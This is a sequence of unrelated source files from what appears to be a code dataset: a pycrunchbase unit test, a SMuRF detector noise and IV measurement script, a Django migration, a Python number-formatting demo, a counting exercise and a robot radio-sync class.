represented (defaults to '[kN.m/m]')
viewName: name of the view that contains the renderer (available standard
views: "XYZPos", "XYZNeg", "XPos", "XNeg","YPos", "YNeg",
"ZPos", "ZNeg", "+X+Y+Z", "+X+Y-Z", "+X-Y+Z", "+X-Y-Z",
"-X+Y+Z", "-X+Y-Z",
"-X-Y+Z", "-X-Y-Z") (defaults to "XYZPos")
hCamFct: factor that applies to the height of the camera position
in order to change perspective of isometric views
(defaults to 1, usual values 0.1 to 10)
viewNameBeams: name of the view for beam elements displays (defaults to "XYZPos")
hCamFctBeams: factor that applies to the height of the camera position for
beam displays (defaults to 1)
'''
# Load case A1: impact on parapet head. Display loads, displacements and
# internal forces for the listed element sets.
A1=graphical_reports.RecordLoadCaseDisp(loadCaseName='A1',loadCaseDescr='A1: impact on parapet head',loadCaseExpr='1.0*A1',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A1.unitsScaleLoads= 1e-3   # scale loads for display (presumably N -> kN)
A1.unitsScaleForc= 1e-3    # scale internal forces for display
A1.unitsScaleMom= 1e-3     # scale bending moments for display
A1.unitsScaleDispl= 1e3    # displacements shown in mm (m -> mm)
A1.viewName= "-X+Y+Z"      # isometric camera orientation
A1.unitsDispl='[mm]'
# Load case A2: impact on parapet body. Same display settings as A1.
A2=graphical_reports.RecordLoadCaseDisp(loadCaseName='A2',loadCaseDescr='A2: impact on parapet body',loadCaseExpr='1.0*A2',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A2.unitsScaleLoads= 1e-3
A2.unitsScaleForc= 1e-3
A2.unitsScaleMom= 1e-3
A2.unitsScaleDispl= 1e3
A2.viewName= "-X+Y+Z"
A2.unitsDispl='[mm]'
"[email protected]"
] | |
81d343fe13a8e35e1122f366e78878bab4d952e7 | 8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f | /tests/test_person.py | 43307a82a22e73117afeea3e18ab139709902ab1 | [
"MIT"
] | permissive | ngzhian/pycrunchbase | 58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808 | ead7c93a51907141d687da02864a3803d1876499 | refs/heads/master | 2023-07-08T06:18:59.314695 | 2023-07-03T13:27:06 | 2023-07-03T13:27:06 | 30,629,033 | 69 | 45 | MIT | 2020-12-02T02:26:40 | 2015-02-11T03:39:14 | Python | UTF-8 | Python | false | false | 1,950 | py | from datetime import datetime
from unittest import TestCase
from pycrunchbase import Person
PERSON_DATA = {
"uuid": "uuid",
"type": "Person",
"properties": {
"permalink": "first-last",
"last_name": "Last",
"first_name": "First",
"bio": "Bio",
"role_investor": True,
"born_on": "2000-01-02",
"born_on_trust_code": 7,
"is_deceased": False,
"died_on": None,
"died_on_trust_code": 0,
"created_at": 1233271545,
"updated_at": 1419596914,
},
"relationships": {
"news": {
"cardinality": "OneToMany",
"paging": {
"total_items": 2,
"first_page_url": "https://api.crunchbase.com/v3.1/person/first-last/news",
"sort_order": "created_at DESC"
},
"items": [
{
"url": "http://example.com/news_1/",
"author": "Author 1",
"posted_on": "2012-12-28",
"type": "PressReference",
"title": "Title 1",
"created_at": 1356743058,
"updated_at": 2012
},
{
"url": "example.com/news_2/",
"author": "Author 2",
"posted_on": "2012-04-20",
"type": "PressReference",
"title": "Title 2",
"created_at": 1334962777,
"updated_at": 2012
},
]
}
}
}
class PersonTestCase(TestCase):
    """Tests that Person parses the Crunchbase API payload correctly."""

    def test_properties(self):
        # Values come straight from the 'properties' section of
        # PERSON_DATA; date strings are parsed into datetime objects.
        person = Person(PERSON_DATA)
        self.assertEqual(person.permalink, 'first-last')
        self.assertEqual(person.last_name, 'Last')
        self.assertEqual(person.first_name, 'First')
        self.assertEqual(person.bio, 'Bio')
        self.assertEqual(person.role_investor, True)
        self.assertEqual(person.born_on, datetime(2000, 1, 2))
        self.assertEqual(person.born_on_trust_code, 7)
        self.assertEqual(person.is_deceased, False)
        self.assertEqual(person.died_on, None)
        self.assertEqual(person.died_on_trust_code, 0)

    def test_relationships(self):
        # The 'news' relationship should expose both items in the payload.
        person = Person(PERSON_DATA)
        self.assertIsNotNone(person.news)
        self.assertEqual(2, len(person.news))
| [
"[email protected]"
] | |
94b669b4d7fd6a41c17fb8fee0444d3ccd13ebcf | d3679511615b126a199fcaf923d9613526a3d41f | /chw3k5/checklist/unversioned-yuhan/uxm_bath_iv_noise_biasstep.py | 2f7f56f6d12ab929aacf83dff9cef4a9953ea2ed | [] | no_license | simonsobs/readout-script-dev | a00850eb294ca9dea7ba11af3a8af0f7f9404fd5 | 0b002f1477efb6b5fcaddc4a282c35883165a42a | refs/heads/master | 2023-08-07T14:44:42.635388 | 2023-08-01T17:36:44 | 2023-08-01T17:36:44 | 164,685,976 | 1 | 2 | null | 2021-07-27T05:25:44 | 2019-01-08T16:08:13 | Jupyter Notebook | UTF-8 | Python | false | false | 19,011 | py | '''
Code written in Oct 2021 by Yuhan Wang
to be used through OCS
UFM testing script in Pton
takes SC noise, normal noise, IV, (noise and biasstep) at 30,50,70 percent Rn
'''
import matplotlib
matplotlib.use('Agg')
import pysmurf.client
import argparse
import numpy as np
import os
import time
import glob
from sodetlib.det_config import DetConfig
import numpy as np
from scipy.interpolate import interp1d
import argparse
import time
import csv
parser = argparse.ArgumentParser()
parser.add_argument('--slot',type=int)
parser.add_argument('--temp',type=str)
parser.add_argument('--output_file',type=str)
args = parser.parse_args()
slot_num = args.slot
bath_temp = args.temp
out_fn = args.output_file
cfg = DetConfig()
cfg.load_config_files(slot=slot_num)
S = cfg.get_smurf_control()

# Known-good tune file for each SMuRF slot on this system. Slots outside
# this table leave fav_tune_files unset, exactly as the original if-chain.
_SLOT_TUNE_FILES = {
    2: '/data/smurf_data/tune/1634501972_tune.npy',
    3: '/data/smurf_data/tune/1634492357_tune.npy',
    4: '/data/smurf_data/tune/1634507354_tune.npy',
    5: '/data/smurf_data/tune/1633652773_tune.npy',
}
if slot_num in _SLOT_TUNE_FILES:
    fav_tune_files = _SLOT_TUNE_FILES[slot_num]
# Reset the system to a known state and load the favorite tune.
S.all_off()
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.set_mode_dc()
S.load_tune(fav_tune_files)
# Configure attenuators, tone powers and tracking for every band.
bands = [0,1,2,3,4,5,6,7]
for band in bands:
    print('setting up band {}'.format(band))
    S.set_att_dc(band,cfg.dev.bands[band]['dc_att'])
    print('band {} dc_att {}'.format(band,S.get_att_dc(band)))
    S.set_att_uc(band,cfg.dev.bands[band]['uc_att'])
    print('band {} uc_att {}'.format(band,S.get_att_uc(band)))
    S.amplitude_scale[band] = cfg.dev.bands[band]['drive']
    print('band {} tone power {}'.format(band,S.amplitude_scale[band] ))
    print('setting synthesis scale')
    # hard coding it for the current fw
    S.set_synthesis_scale(band,1)
    print('running relock')
    S.relock(band,tone_power=cfg.dev.bands[band]['drive'])
    S.run_serial_gradient_descent(band);
    S.run_serial_eta_scan(band);
    print('running tracking setup')
    S.set_feedback_enable(band,1)
    S.tracking_setup(band,reset_rate_khz=cfg.dev.bands[band]['flux_ramp_rate_khz'],fraction_full_scale=cfg.dev.bands[band]['frac_pp'], make_plot=False, save_plot=False, show_plot=False, channel=S.which_on(band), nsamp=2**18, lms_freq_hz=None, meas_lms_freq=True,feedback_start_frac=cfg.dev.bands[band]['feedback_start_frac'],feedback_end_frac=cfg.dev.bands[band]['feedback_end_frac'],lms_gain=cfg.dev.bands[band]['lms_gain'])
    print('checking tracking')
    S.check_lock(band,reset_rate_khz=cfg.dev.bands[band]['flux_ramp_rate_khz'],fraction_full_scale=cfg.dev.bands[band]['frac_pp'], lms_freq_hz=None, feedback_start_frac=cfg.dev.bands[band]['feedback_start_frac'],feedback_end_frac=cfg.dev.bands[band]['feedback_end_frac'],lms_gain=cfg.dev.bands[band]['lms_gain'])
# Bias lines used for all subsequent measurements.
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_filter_disable(0)
S.set_rtm_arb_waveform_enable(0)
S.set_downsample_factor(20)
# Put every bias line into low-current mode ahead of the superconducting
# noise measurement. (The original enumerate() index was unused.)
for bias_g in bias_groups:
    S.set_tes_bias_low_current(bias_g)
bias_v = 0
## SC noise
# Zero bias on all 12 detector bias lines, wait for the system to settle,
# then stream 120 s of superconducting-state noise data.
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.set_tes_bias_bipolar_array([bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,bias_v,0,0,0])
time.sleep(120)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
# CSV schema reused by every later section of this script.
fieldnames = ['bath_temp','bias_voltage', 'bias_line', 'band', 'data_path','type','note']
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = bias_v
row['type'] = 'sc noise'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
    writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
    writer.writerow(row)
## Normal noise
# Overbias all detectors into the normal branch, wait for thermal
# stabilization, then stream 120 s of normal-state noise data.
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 15, cool_wait= 3, high_current_mode=False, overbias_voltage= 5)
## sleep 6 mins to get stablized
for i in range(36):
    time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = 20
row['type'] = 'normal noise'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
    writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
    writer.writerow(row)
##IV
# Take an IV curve (20 V down to 0 V) on each bias line in turn and log
# the path of the resulting analysis .npy file.
bl_iv_list = []
for bias_gp in [0,1,2,3,4,5,6,7,8,9,10,11]:
    row = {}
    row['bath_temp'] = bath_temp
    row['bias_line'] = bias_gp
    row['band'] = 'all'
    row['bias_voltage'] = 'IV 20 to 0'
    row['type'] = 'IV'
    print(f'Taking IV on bias line {bias_gp}, all band')
    iv_data = S.run_iv(bias_groups = [bias_gp], wait_time=0.001, bias_high=20, bias_low=0, bias_step = 0.025, overbias_voltage=18, cool_wait=0, high_current_mode=False, make_plot=False, save_plot=True, cool_voltage = 18)
    # run_iv returns a path ending in a fixed-length suffix; strip it to
    # get the analysis file (NOTE(review): relies on suffix length 13).
    dat_file = iv_data[0:-13]+'.npy'
    row['data_path'] = dat_file
    bl_iv_list.append(dat_file)
    with open(out_fn, 'a', newline = '') as csvfile:
        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
        writer.writerow(row)
#no wave form please
S.set_rtm_arb_waveform_enable(0)
##get target v bias from IV
good_chans = 0
all_data = dict()
for ind, bl in enumerate(bias_groups):
if bl not in all_data.keys():
all_data[bl] = dict()
now = np.load(bl_iv_list[bl], allow_pickle=True).item()
# print(now[3].keys())
# print(now[0].keys())
# print(now[0][0]['R'])
for sb in [0,1,2,3,4,5,6,7]:
try:
if len(now[sb].keys()) != 0:
all_data[bl][sb] = dict()
except:
continue
# print(now[sb].keys())
for chan, d in now[sb].items():
# print(d.keys())
if (d['R'][-1] < 5e-3):
continue
elif len(np.where(d['R'] > 10e-3)[0]) > 0:
continue
# elif len(np.where(d['R'] < -2e-4)[0]) > 10:
# continue
now_chan = len(all_data[bl][sb].keys())
all_data[bl][sb][now_chan] = d
good_chans += 1
##70% Rn first
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.7
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(36):
time.sleep(10)
#switch to high current mode and diable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '70 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '70 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '70 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 1 mins
for i in range(6):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '70 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##50% Rn
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.5
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(36):
time.sleep(10)
#switch to high current mode and diable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '50 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 5 mins
for i in range(36):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '50 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
##30% Rn
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
v_bias_all = []
RN = []
target_vbias_list = []
for bl in bias_groups:
percent_rn = 0.3
target_v_bias = []
for band in [0,1,2,3,4,5,6,7]:
try:
for ch,d in all_data[bl][band].items():
rn = d['R']/d['R_n']
cross_idx = np.where(np.logical_and(rn - percent_rn >= 0, np.roll(rn - percent_rn, 1) < 0))[0]
RN.append(d['R_n'])
target_v_bias.append(d['v_bias'][cross_idx][0])
v_bias_all.append(d['v_bias'][cross_idx][0])
except:
continue
# print(target_v_bias)
med_target_v_bias = np.median(np.array(target_v_bias))
if med_target_v_bias > 12:
target_vbias_list.append(0)
else:
target_vbias_list.append(round(med_target_v_bias,1))
target_vbias_list = np.append(target_vbias_list,[0,0,0])
S.overbias_tes_all(bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11], overbias_wait=1, tes_bias= 5, cool_wait= 3, high_current_mode=True, overbias_voltage= 5)
bias_array = np.array(target_vbias_list) / S.high_low_current_ratio
S.set_tes_bias_bipolar_array(bias_array)
print('waiting extra long for this heat to go away')
for i in range(30):
time.sleep(10)
#switch to high current mode and diable all filters
print('preparing for bias step')
S.set_downsample_factor(1)
S.set_filter_disable(1)
step_size = 0.1 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(1)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(1)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.025 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
step_size = 0.01 / S.high_low_current_ratio
bias_voltage = bias_array
dat_path = S.stream_data_on()
for k in [0,1]:
S.set_tes_bias_bipolar_array(bias_array)
time.sleep(2)
S.set_tes_bias_bipolar_array(bias_array - step_size)
time.sleep(2)
S.stream_data_off()
row = {}
row['bath_temp'] = bath_temp
row['data_path'] = dat_path
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = 'bias step'
row['bias_line'] = 'all'
row['band'] = 'all'
row['note'] = '30 Rn step size {}'.format(step_size)
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
#bias to low current mode target first
bias_groups = [0,1,2,3,4,5,6,7,8,9,10,11]
S.set_tes_bias_bipolar_array(target_vbias_list)
#immediately drop to low current
S.set_tes_bias_low_current(bias_groups)
# sleep for 1 mins
for i in range(30):
time.sleep(10)
datafile_self = S.stream_data_on()
time.sleep(120)
S.stream_data_off()
row = {}
row['data_path'] = datafile_self
row['bias_voltage'] = str(S.get_tes_bias_bipolar_array())
row['type'] = '30 percent noise low current mode'
row['bias_line'] = 'all'
row['band'] = 'all'
row['bath_temp'] = bath_temp
with open(out_fn, 'a', newline = '') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(row)
#turn filter back on and sample rate into 200Hz
S.set_rtm_arb_waveform_enable(0)
S.set_filter_disable(0)
S.set_downsample_factor(20)
| [
"[email protected]"
] | |
8d53e43ebb62761b82dede6505a974d381b4e938 | 28c0bcb13917a277cc6c8f0a34e3bb40e992d9d4 | /koku/reporting/migrations/0109_remove_ocpusagelineitemdailysummary_pod.py | 7fc341bdb4450847e431947e91154a91e5a14a73 | [
"Apache-2.0"
] | permissive | luisfdez/koku | 43a765f6ba96c2d3b2deda345573e1d97992e22f | 2979f03fbdd1c20c3abc365a963a1282b426f321 | refs/heads/main | 2023-06-22T13:19:34.119984 | 2021-07-20T12:01:35 | 2021-07-20T12:01:35 | 387,807,027 | 0 | 1 | Apache-2.0 | 2021-07-20T13:50:15 | 2021-07-20T13:50:14 | null | UTF-8 | Python | false | false | 284 | py | # Generated by Django 2.2.11 on 2020-03-27 19:21
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("reporting", "0108_auto_20200405_1316")]
operations = [migrations.RemoveField(model_name="ocpusagelineitemdailysummary", name="pod")]
| [
"[email protected]"
] | |
30a1390b789e4bd86190b477b462d67108f7a4a3 | e1857e582609640f60923ea461da3e84c498095a | /block2-datatypes/numbers/number-demo.py | 671907978a108eb946e216b4c5cc6293cf1ca1c1 | [] | no_license | mbaeumer/python-challenge | 178f188004e66c5c4092af51ae5d496679d39dec | 4cff4a4939268a496117158b0be4e20f4d934213 | refs/heads/master | 2023-08-07T22:43:35.490777 | 2023-07-21T21:26:46 | 2023-07-21T21:26:46 | 75,015,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,063 | py | #!/usr/bin/python
from decimal import Decimal
from decimal import DecimalException
import random
def get_user_input():
answer = ""
while answer == "":
answer = input("Please enter a number: ")
return answer
def convert_to_int(s):
try:
print(int(s))
except ValueError:
print("Cannot convert to int")
def convert_to_float(s):
try:
print(float(s))
except ValueError:
print("Cannot convert to float")
def convert_to_decimal(s):
try:
print(Decimal(s))
except DecimalException:
print("Cannot convert to Decimal")
def determine_type(answer):
return type(answer)
# showing difference in precision of float vs decimal
def diff_decimal_float():
print("Difference between Decimal and float")
x = Decimal("0.1")
y = float("0.1")
print(f"{x:.20f}")
print(f"{y:.20f}")
def calc_with_decimals():
print("Calculating with decimals")
x = Decimal(34)
y = Decimal(7)
z = x / y
print(f"{z:.20f}")
def calc_with_floats():
print("Calculating with floats")
a = 34
b = 7
c = a/b
print(f"{c:.20f}")
def format_number(number):
print("Formatting alternatives")
print("{:.2f}".format(number))
print("{:+.2f}".format(number))
print("{:.0f}".format(number))
print("{:0>2d}".format(5))
print("{:,}".format(1000000))
print("{:.2%}".format(number))
print("{:.2e}".format(number))
print("{:10d}".format(50))
print("{:<10d}".format(50))
print("{:^10d}".format(50))
def generate_random_numbers():
random1 = random.randint(1,6) # 1..6
random2 = random.randrange(6) # 0..5
print("Generating random numbers")
print("With randint: ", random1)
print("With randrange: ", random2)
def operators_for_ints():
a = 5
b = 2
print("5/2 = %d" % (a/b))
print("5%%2 = %d" % (a%b))
print("5//2 = %d" % (a//b))
answer = get_user_input()
print(type(answer))
convert_to_int(answer)
convert_to_float(answer)
convert_to_decimal(answer)
diff_decimal_float()
calc_with_decimals()
calc_with_floats()
format_number(34/7)
generate_random_numbers()
operators_for_ints()
# TODO:
# currency
| [
"[email protected]"
] | |
08e6e9616fe6a91d63adef510f938ac99e569b81 | 9249f87109471de1fc3f3c3c1b121f51c09df683 | /lesson_3/test_10.py | 89d99c4f00ee36886084f1928bbce7ee094081ba | [] | no_license | anton1k/mfti-homework | 400a8213a57e44478d65437f5afef0432e8e84ea | 93683de329e6cb0001e713214aeb3069f6e213b0 | refs/heads/master | 2020-07-18T23:41:11.473608 | 2020-01-12T10:58:16 | 2020-01-12T10:58:16 | 206,335,501 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 652 | py | # Последовательность состоит из натуральных чисел и завершается числом 0. Всего вводится не более 10000 чисел (не считая завершающего числа 0). Определите, сколько элементов этой последовательности равны ее наибольшему элементу. Числа, следующие за числом 0, считывать не нужно.
d = 0
s = 0
while True:
x = int(input())
if x == 0:
break
if x > d:
d, s = x, 1
elif x == d:
s += 1
print(s) | [
"[email protected]"
] | |
a66ea0e584b1c0c16a1073e306b633b0ae4bd795 | 3da102290ebe6c186474ecbeec9065ea2e5357e3 | /pi/robot.py | 4d162feefe0008daae6f7e2e33d88865d9c46d45 | [] | no_license | fo-am/penelopean-robotics | 55cbbebe29f15fe5996222a5db36040ac400b8f3 | 2a6f81a4d8b098ac513bd42df980e64128df8a1b | refs/heads/master | 2022-05-28T17:46:36.579042 | 2022-05-19T13:35:47 | 2022-05-19T13:35:47 | 134,366,263 | 8 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,976 | py | import yarnasm
import radio
import time
# things we want to be able to do:
# * tweak servo defaults
# * queue of messages to send?
class robot:
def __init__(self,address):
self.address=address
self.telemetry=[0 for i in range(256)]
self.code=[]
self.source=""
self.state="running"
self.ping_time=time.time()
self.watchdog_timeout=10
self.ping_duration=2
self.start_walking=False
self.set_led=False
self.led_state=False
def pretty_print(self):
out = "robot: "+str(self.telemetry[yarnasm.registers["ROBOT_ID"]])+"\n"
out+= "pc: "+str(self.telemetry[yarnasm.registers["PC_MIRROR"]])+"\n"
out+= "a: "+str(self.telemetry[yarnasm.registers["A"]])+"\n"
out+= "step: "+str(self.telemetry[yarnasm.registers["STEP_COUNT"]])+"\n"
def telemetry_callback(self,data):
if self.state=="disconnected" or self.state=="waiting":
self.state="connected"
self.telemetry=data
#print("telemetry: "+str(self.address[4])+" "+str(data[0])+" "+str(data[9]))
self.ping_time=time.time()
def sync(self,radio,beat,ms_per_beat):
reg_sets = []
# update A register here, based on if the start flag has been set
if self.start_walking:
reg_sets+=[[yarnasm.registers["A"],1]]
self.start_walking=False
if self.set_led:
reg_sets+=[[yarnasm.registers["LED"],self.led_state]]
telemetry = radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
if telemetry!=[]:
self.telemetry = telemetry
